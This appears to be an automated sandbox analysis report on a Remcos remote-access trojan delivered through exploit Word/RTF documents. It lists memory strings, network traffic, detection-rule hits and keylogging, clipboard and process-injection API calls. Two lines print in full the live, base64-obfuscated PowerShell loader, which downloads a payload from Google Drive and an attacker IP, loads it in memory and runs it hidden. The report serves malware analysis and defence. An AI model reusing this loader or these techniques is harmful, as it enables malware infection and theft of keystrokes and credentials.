                  Source: bhv2D0A.tmp.22.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBqRcpR.img?h=16&w=16&m
                  Source: bhv2D0A.tmp.22.drString found in binary or memory: http://static.chartbeat.com/js/chartbeat.js
                  Source: bhv2D0A.tmp.22.drString found in binary or memory: http://widgets.outbrain.com/external/publishers/msn/MSNIdSync.js
                  Source: powershell.exe, 00000013.00000002.522222538.0000000005153000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
                  Source: powershell.exe, 00000013.00000002.522222538.0000000005153000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
                  Source: CasPol.exe, CasPol.exe, 00000018.00000002.527130707.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com
                  Source: CasPol.exe, CasPol.exe, 00000018.00000002.527291764.0000000000459000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000018.00000002.527130707.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.com
                  Source: CasPol.exe, 00000018.00000002.527037105.000000000019C000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.com/y
                  Source: CasPol.exe, 00000018.00000002.527130707.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
                  Source: CasPol.exe, 00000018.00000002.527130707.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comr
                  Source: bhv2D0A.tmp.22.drString found in binary or memory: http://www.msn.com/
                  Source: bhv2D0A.tmp.22.drString found in binary or memory: http://www.msn.com/?ocid=iehp
                  Source: bhv2D0A.tmp.22.drString found in binary or memory: http://www.msn.com/advertisement.ad.js
                  Source: bhv2D0A.tmp.22.drString found in binary or memory: http://www.msn.com/de-de/?ocid=iehp
                  Source: CasPol.exe, 00000018.00000002.527130707.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net/
                  Source: CasPol.exe, 00000016.00000002.531106226.0000000000384000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net8E
                  Source: bhv2D0A.tmp.22.drString found in binary or memory: https://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.9.1.min.js
                  Source: bhv2D0A.tmp.22.drString found in binary or memory: https://contextual.media.net/
                  Source: bhv2D0A.tmp.22.drString found in binary or memory: https://contextual.media.net/8/nrrV73987.js
                  Source: bhv2D0A.tmp.22.drString found in binary or memory: https://contextual.media.net/803288796/fcmain.js?&gdpr=1&cid=8CUT39MWR&cpcd=2K6DOtg60bLnBhB3D4RSbQ%3
                  Source: bhv2D0A.tmp.22.drString found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2
                  Source: bhv2D0A.tmp.22.drString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1
                  Source: powershell.exe, 0000000B.00000002.456616476.0000000003529000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                  Source: powershell.exe, 0000000B.00000002.456616476.0000000003529000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                  Source: powershell.exe, 0000000B.00000002.456616476.0000000003529000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                  Source: bhv2D0A.tmp.22.drString found in binary or memory: https://cvision.media.net/new/286x175/2/137/169/197/852af93e-e705-48f1-93ba-6ef64c8308e6.jpg?v=9
                  Source: bhv2D0A.tmp.22.drString found in binary or memory: https://cvision.media.net/new/286x175/3/72/42/210/948f45db-f5a0-41ce-a6b6-5cc9e8c93c16.jpg?v=9
                  Source: bhv2D0A.tmp.22.drString found in binary or memory: https://dc.ads.linkedin.com/collect/?pid=6883&opid=7850&fmt=gif&ck=&3pc=true&an_user_id=591650497549
                  Source: bhv2D0A.tmp.22.drString found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
                  Source: powershell.exe, 00000013.00000002.515289278.0000000002639000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com
                  Source: powershell.exe, 00000013.00000002.515289278.0000000002639000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur
                  Source: powershell.exe, 00000013.00000002.515289278.0000000002758000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com
                  Source: powershell.exe, 00000013.00000002.515289278.0000000002758000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur&export=download
                  Source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/dahall/taskscheduler
                  Source: bhv2D0A.tmp.22.drString found in binary or memory: https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au
                  Source: CasPol.exeString found in binary or memory: https://login.yahoo.com/config/login
                  Source: powershell.exe, 0000000B.00000002.456616476.0000000003529000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                  Source: bhv2D0A.tmp.22.drString found in binary or memory: https://policies.yahoo.com/w3c/p3p.xml
                  Source: bhv2D0A.tmp.22.drString found in binary or memory: https://s.yimg.com/lo/api/res/1.2/cKqYjmGd5NGRXh6Xptm6Yg--~A/Zmk9ZmlsbDt3PTYyMjtoPTM2ODthcHBpZD1nZW1
                  Source: powershell.exe, 00000013.00000002.522222538.0000000005153000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
                  Source: bhv2D0A.tmp.22.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-eus/sc/9b/e151e5.gif
                  Source: CasPol.exe, 00000016.00000002.531817073.0000000001D9D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.google
                  Source: CasPol.exe, 00000016.00000002.531960219.0000000002A60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
                  Source: bhv2D0A.tmp.22.drString found in binary or memory: https://www.ccleaner.com/go/app_cc_pro_trialkey
                  Source: CasPol.exe, CasPol.exe, 00000018.00000002.527130707.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
                  Source: CasPol.exeString found in binary or memory: https://www.google.com/accounts/servicelogin
                  Source: bhv2D0A.tmp.22.drString found in binary or memory: https://www.msn.com/en-us/homepage/secure/silentpassport?secure=false&lc=1033
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49161 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49163 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49168
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49162 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49164 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49166
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49165 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49165
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49164
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49163
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49162
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49161
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49172
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49171
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49172 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49168 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49171 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49166 -> 443
                  Source: unknownHTTPS traffic detected: 24.199.88.84:443 -> 192.168.2.22:49161 version: TLS 1.2

                  Key, Mouse, Clipboard, Microphone and Screen Capturing

                  barindex
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 20_2_0040A2F3 SetWindowsHookExA 0000000D,0040A2DF,0000000020_2_0040A2F3
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWindows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 20_2_0040B749 OpenClipboard,GetClipboardData,CloseClipboard,20_2_0040B749
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 20_2_004168FC OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,20_2_004168FC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 22_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,22_2_0040987A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 22_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,22_2_004098E2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 23_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,23_2_00406DFC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 23_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,23_2_00406E9F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 24_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,24_2_004068B5
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 24_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,24_2_004072B5
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 20_2_0040B749 OpenClipboard,GetClipboardData,CloseClipboard,20_2_0040B749
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 20_2_0040A41B GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,20_2_0040A41B
                  Source: C:\Windows\SysWOW64\mshta.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: Yara matchFile source: 20.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 20.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000013.00000002.515289278.00000000038C8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 2924, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 3608, type: MEMORYSTR

                  E-Banking Fraud

                  barindex
                  Source: Yara matchFile source: 20.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 20.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000014.00000002.696341124.0000000000755000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000013.00000002.515289278.00000000038C8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 2924, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 3608, type: MEMORYSTR
                  Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\wordse\logs.dat, type: DROPPED

                  Spam, unwanted Advertisements and Ransom Demands

                  barindex
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 20_2_0041CA73 SystemParametersInfoW,20_2_0041CA73

                  System Summary

                  barindex
                  Source: 20.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 20.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 20.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 20.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 20.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 20.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 00000013.00000002.515289278.00000000038C8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: Process Memory Space: powershell.exe PID: 1980, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                  Source: Process Memory Space: powershell.exe PID: 2924, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: Process Memory Space: powershell.exe PID: 2924, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                  Source: Process Memory Space: CasPol.exe PID: 3608, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\54D5D963.doc, type: DROPPEDMatched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
                  Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\deethebestthingwithmegreatattirudewithgreatthigns_________eniterlifewithgreatniceworkingskillwithmebgreatthignstobe________verynicepersonentiterlifewithnewthi[1].doc, type: DROPPEDMatched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\wg on 85.215.206.82.urlJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\ProgIDJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdhVUtpbWFnZVVybCA9IHp0c2h0dHBzOi8vZCcrJ3JpdmUuZ29vZ2xlLmNvbS91YycrJz9leHBvJysncnQ9ZG93bmxvYWQmaWQ9MUFJVmdKSkp2MUY2dlM0c1VPeWJuSC1zRHZVaEJZd3VyIHp0czsnKydhVUt3ZWJDbGllbnQgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50O2FVS2ltYWdlQnl0ZXMgPSBhVUt3JysnZWJDbGllbnQuRG93bmxvYWREYXRhKGFVS2ltYWdlVXJsKTthVUtpbWFnZVRleCcrJ3QgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZyhhVUtpbWFnZUJ5dGVzKTthVUtzdGFydEZsYWcgPSB6dHM8PEJBU0U2NF9TVEFSVD4+enRzO2FVS2VuZEZsYWcnKycgPSB6dHM8PEJBU0U2NF9FTkQ+Pnp0czthVUtzdGFydEluZGV4ID0gYVVLaW1hZ2VUZXh0LkluZGV4T2YoYVVLc3RhcnRGbGFnKTthVUtlbmRJbmRleCA9IGFVS2ltYWdlVGV4dC5JbmRleE9mKGFVS2VuZEZsYWcpO2FVS3N0YXJ0SW5kZXggLWdlIDAgLWFuZCBhVUtlbmRJbmRleCAtZ3QnKycgJysnYVVLc3RhcnRJbmRleDthVUtzdCcrJ2FydEluZGV4ICs9IGFVS3N0YXJ0RmxhZy5MZW5nJysndGg7YVVLYmFzZTY0TGVuZ3RoID0gYVVLZW5kSW5kZXggLSBhVUtzdGFydEluZGV4O2FVS2JhJysnc2U2NENvbW1hbmQgPSBhVUtpbWFnZVRleHQuU3Vic3RyaW5nKGFVS3N0YXJ0SW5kZXgsIGFVS2Jhc2U2NExlbmd0aCk7YVVLYmFzZTY0UmV2ZXJzZWQgPSAtam9pbiAoYVVLYmFzZTY0Q29tbWFuZC5Ub0NoYXJBcnJheSgpIGRyYiBGb3JFYWNoLU9iamVjdCB7IGFVS18gfSlbLTEuLi0oYVVLYmFzZTY0Q29tbWFuZC5MZW5ndGgpXTthVUtjb21tYW5kQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdJysnOjpGcm9tQmFzJysnZTY0U3RyaW5nKGFVS2Jhc2U2NFJldmVyc2VkKTthVUtsb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV0nKyc6OkxvYWQoYVVLY29tbWFuZEJ5dGVzKTthVUt2YWlNZXRob2QgPSBbZG5saWIuSU8uSG9tZV0uR2V0TWV0JysnaG9kKHp0c1ZBSXp0cyk7YVVLdmFpTWUnKyd0aG9kLkludm9rZShhVUtudWxsLCBAKHonKyd0c3R4dC5FQ0RGRlJXLzA3Mi8yOC42MDIuNTEyLjU4Ly86cHR0aHp0cywgenRzZGVzYXRpdmFkb3p0JysncywgenRzZGVzJysnYXRpdmEnKydkb3p0cywgenRzZGVzYXRpdmFkb3p0cywgenRzQ2FzUG9senRzLCB6dHNkZXNhdGl2YWRvenRzLCB6dHNkZScrJ3NhdGl2YWRvenRzLHp0c2Rlc2F0aXZhZG96dHMsenRzJysnZGVzYXRpdmFkb3p0cyx6dHNkZXNhdGl2YWRvenQnKydzLHp0c2Rlc2F0aXZhZG96dHMsJysnenRzZGVzYXRpdmFkb3p0cyx6dHMxenRzLHp0c2Rlc2F0aXZhZG96dHMpKTsnKS5yZXBsYWNFKCdhVUsnLCckJykucmVwbGFjRSgnenRzJyxbc1RSaW5HXVtjSEFyXTM5KS5yZXBsYWNFKCdkcmInLCd8Jyl8IC4gKCAkcFNIb01lWzIxXSskUFNob01FWzM0XSsnWCcp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdhVUtpbWFnZVVybCA9IHp0c2h0dHBzOi8vZCcrJ3JpdmUuZ29vZ2xlLmNvbS91YycrJz9leHBvJysncnQ9ZG93bmxvYWQmaWQ9MUFJVmdKSkp2MUY2dlM0c1VPeWJuSC1zRHZVaEJZd3VyIHp0czsnKydhVUt3ZWJDbGllbnQgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50O2FVS2ltYWdlQnl0ZXMgPSBhVUt3JysnZWJDbGllbnQuRG93bmxvYWREYXRhKGFVS2ltYWdlVXJsKTthVUtpbWFnZVRleCcrJ3QgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZyhhVUtpbWFnZUJ5dGVzKTthVUtzdGFydEZsYWcgPSB6dHM8PEJBU0U2NF9TVEFSVD4+enRzO2FVS2VuZEZsYWcnKycgPSB6dHM8PEJBU0U2NF9FTkQ+Pnp0czthVUtzdGFydEluZGV4ID0gYVVLaW1hZ2VUZXh0LkluZGV4T2YoYVVLc3RhcnRGbGFnKTthVUtlbmRJbmRleCA9IGFVS2ltYWdlVGV4dC5JbmRleE9mKGFVS2VuZEZsYWcpO2FVS3N0YXJ0SW5kZXggLWdlIDAgLWFuZCBhVUtlbmRJbmRleCAtZ3QnKycgJysnYVVLc3RhcnRJbmRleDthVUtzdCcrJ2FydEluZGV4ICs9IGFVS3N0YXJ0RmxhZy5MZW5nJysndGg7YVVLYmFzZTY0TGVuZ3RoID0gYVVLZW5kSW5kZXggLSBhVUtzdGFydEluZGV4O2FVS2JhJysnc2U2NENvbW1hbmQgPSBhVUtpbWFnZVRleHQuU3Vic3RyaW5nKGFVS3N0YXJ0SW5kZXgsIGFVS2Jhc2U2NExlbmd0aCk7YVVLYmFzZTY0UmV2ZXJzZWQgPSAtam9pbiAoYVVLYmFzZTY0Q29tbWFuZC5Ub0NoYXJBcnJheSgpIGRyYiBGb3JFYWNoLU9iamVjdCB7IGFVS18gfSlbLTEuLi0oYVVLYmFzZTY0Q29tbWFuZC5MZW5ndGgpXTthVUtjb21tYW5kQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdJysnOjpGcm9tQmFzJysnZTY0U3RyaW5nKGFVS2Jhc2U2NFJldmVyc2VkKTthVUtsb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV0nKyc6OkxvYWQoYVVLY29tbWFuZEJ5dGVzKTthVUt2YWlNZXRob2QgPSBbZG5saWIuSU8uSG9tZV0uR2V0TWV0JysnaG9kKHp0c1ZBSXp0cyk7YVVLdmFpTWUnKyd0aG9kLkludm9rZShhVUtudWxsLCBAKHonKyd0c3R4dC5FQ0RGRlJXLzA3Mi8yOC42MDIuNTEyLjU4Ly86cHR0aHp0cywgenRzZGVzYXRpdmFkb3p0JysncywgenRzZGVzJysnYXRpdmEnKydkb3p0cywgenRzZGVzYXRpdmFkb3p0cywgenRzQ2FzUG9senRzLCB6dHNkZXNhdGl2YWRvenRzLCB6dHNkZScrJ3NhdGl2YWRvenRzLHp0c2Rlc2F0aXZhZG96dHMsenRzJysnZGVzYXRpdmFkb3p0cyx6dHNkZXNhdGl2YWRvenQnKydzLHp0c2Rlc2F0aXZhZG96dHMsJysnenRzZGVzYXRpdmFkb3p0cyx6dHMxenRzLHp0c2Rlc2F0aXZhZG96dHMpKTsnKS5yZXBsYWNFKCdhVUsnLCckJykucmVwbGFjRSgnenRzJyxbc1RSaW5HXVtjSEFyXTM5KS5yZXBsYWNFKCdkcmInLCd8Jyl8IC4gKCAkcFNIb01lWzIxXSskUFNob01FWzM0XSsnWCcp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 770B0000 page execute and read and writeJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeMemory allocated: 770B0000 page execute and read and write
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeMemory allocated: 770B0000 page execute and read and write
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeMemory allocated: 770B0000 page execute and read and write
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeMemory allocated: 770B0000 page execute and read and write
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 20_2_0041812A GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,CreateProcessW,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtCreateSection,NtUnmapViewOfSection,NtMapViewOfSection,VirtualFree,NtClose,TerminateProcess,GetModuleHandleA,GetProcAddress,GetCurrentProcess,NtMapViewOfSection,WriteProcessMemory,SetThreadContext,ResumeThread,VirtualFree,GetCurrentProcess,NtUnmapViewOfSection,NtClose,TerminateProcess,GetLastError,20_2_0041812A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 20_2_0041330D OpenProcess,NtQueryInformationProcess,GetCurrentProcess,DuplicateHandle,GetFinalPathNameByHandleW,CloseHandle,CreateFileMappingW,MapViewOfFile,GetFileSize,UnmapViewOfFile,CloseHandle,CloseHandle,CloseHandle,20_2_0041330D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 20_2_0041BBC6 OpenProcess,NtResumeProcess,CloseHandle,20_2_0041BBC6
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 20_2_0041BB9A OpenProcess,NtSuspendProcess,CloseHandle,20_2_0041BB9A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 22_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,22_2_0040DD85
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 22_2_00401806 NtdllDefWindowProc_W,22_2_00401806
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 22_2_004018C0 NtdllDefWindowProc_W,22_2_004018C0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 23_2_004016FD NtdllDefWindowProc_A,23_2_004016FD
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 23_2_004017B7 NtdllDefWindowProc_A,23_2_004017B7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 24_2_00402CAC NtdllDefWindowProc_A,24_2_00402CAC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 24_2_00402D66 NtdllDefWindowProc_A,24_2_00402D66
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 20_2_004167EF ExitWindowsEx,LoadLibraryA,GetProcAddress,20_2_004167EF
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_00261CBD19_2_00261CBD
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 20_2_0043706A20_2_0043706A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 20_2_0041400520_2_00414005
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 20_2_0043E11C20_2_0043E11C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 20_2_004541D920_2_004541D9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 20_2_004381E820_2_004381E8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 20_2_0041F18B20_2_0041F18B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 20_2_0044627020_2_00446270
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 20_2_0043E34B20_2_0043E34B
